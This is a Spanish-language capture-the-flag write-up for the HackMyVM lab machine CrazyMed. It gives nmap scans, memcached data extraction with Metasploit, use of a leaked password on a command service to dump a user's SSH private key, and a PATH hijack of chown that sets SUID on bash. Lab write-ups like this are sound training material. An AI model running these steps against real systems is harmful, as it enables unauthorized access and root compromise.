cd ~/blog

~/writeups/hmv/055-crazymed.md

055 - CrazyMed

easy Linux hmv 29-03-2024
Memcached unauthenticated data extractionCustom service password + SSH key leakPATH Hijacking (cron chown)
hackmyvm.eu/machines/machine.php?vm=Crazymed

~1 min de lectura


Comenzamos enumerando puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.22
 nmap -sCV -p22,80,4444,11211 -oN 02-targeted.txt 192.168.1.22
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-29 18:07 -03
Nmap scan report for 192.168.1.22
Host is up (0.00048s latency).

PORT      STATE SERVICE   VERSION
22/tcp    open  ssh       OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 db:fb:b1:fe:03:9c:17:36:83:ac:6b:c0:52:ad:a0:05 (RSA)
|   256 56:3b:7c:e3:23:4a:25:5a:be:54:d1:2e:9d:44:9a:06 (ECDSA)
|_  256 81:d4:2e:47:33:34:a9:6f:10:70:c1:90:80:aa:b6:6a (ED25519)
80/tcp    open  http      Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Crazymed Bootstrap Template - Index
4444/tcp  open  krb524?
...
|     tests are performed on human volunteers for a fee.
|     Password:
|     [1;31mAccess denied.
...
11211/tcp open  memcached Memcached 1.6.9 (uptime 232 seconds)
...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.75 seconds

Extraemos los datos de memcached (sin autenticación) con Metasploit, encontrando una contraseña:

msf6 auxiliary(gather/memcached_extractor) > exploit
[+] 192.168.1.22:11211    - Found 4 keys
Keys/Values Found for 192.168.1.22:11211
========================================
 Key            Value
 ---            -----
 conf_location  "VALUE conf_location 0 21\r\n/etc/memecacched.conf\r\nEND\r\n"
 domain         "VALUE domain 0 8\r\ncrazymed\r\nEND\r\n"
 log            "VALUE log 0 18\r\npassword: cr4zyM3d\r\nEND\r\n"
 server         "VALUE server 0 9\r\n127.0.0.1\r\nEND\r\n"

El servicio del puerto 4444 pide esa contraseña y, una vez dentro, permite ejecutar comandos:

 nc 192.168.1.22 4444
Welcome to the Crazymed medical research laboratory.
All our tests are performed on human volunteers for a fee.

Password: cr4zyM3d
Access granted.

Type "?" for help.

System command:

Lo usamos para volcar la id_rsa del usuario brad:

System command: id
uid=1000(brad) gid=1000(brad) groups=1000(brad),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth)

System command: echo `cat /home/brad/.ssh/id_rsa`
-----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEA7RxztsvAPFz3TvDfW7xfFrsltczhiDcNYMkMVsyWTlXBQTb7CiDs ... -----END OPENSSH PRIVATE KEY-----

Tras formatear la clave, nos conectamos por SSH y obtenemos la primera flag. En /opt hay un script que se ejecuta por cron:

brad@crazymed:/opt$ cat check_VM
#! /bin/bash

#users flags
flags=(/root/root.txt /home/brad/user.txt)
for x in "${flags[@]}"
do
if [[ ! -f $x ]] ; then
echo "$x doesn't exist"
mcookie > $x
chmod 700 $x
fi
done

chown -R www-data:www-data /var/www/html

#bash_history => /dev/null
home=$(cat /etc/passwd |grep bash |awk -F: '{print $6}')

for x in $home
do
ln -sf /dev/null $x/.bash_history ; eccho "All's fine !"
done

find /var/log -name "*.log*" -exec rm -f {} +

El script invoca chown por su nombre relativo y /usr/local/bin es escribible, así que hacemos un PATH Hijacking: colocamos ahí un chown malicioso que da SUID a Bash:

brad@crazymed:/opt$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

brad@crazymed:/opt$ ls -la /usr/local/bin
total 8
drwxr-xrwx  2 root root 4096 Oct 31  2022 .

brad@crazymed:/opt$ echo "chmod u+s /bin/bash" > /usr/local/bin/chown; chmod +x /usr/local/bin/chown

brad@crazymed:/opt$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1234376 Mar 27  2022 /bin/bash

Lanzamos bash -p y obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados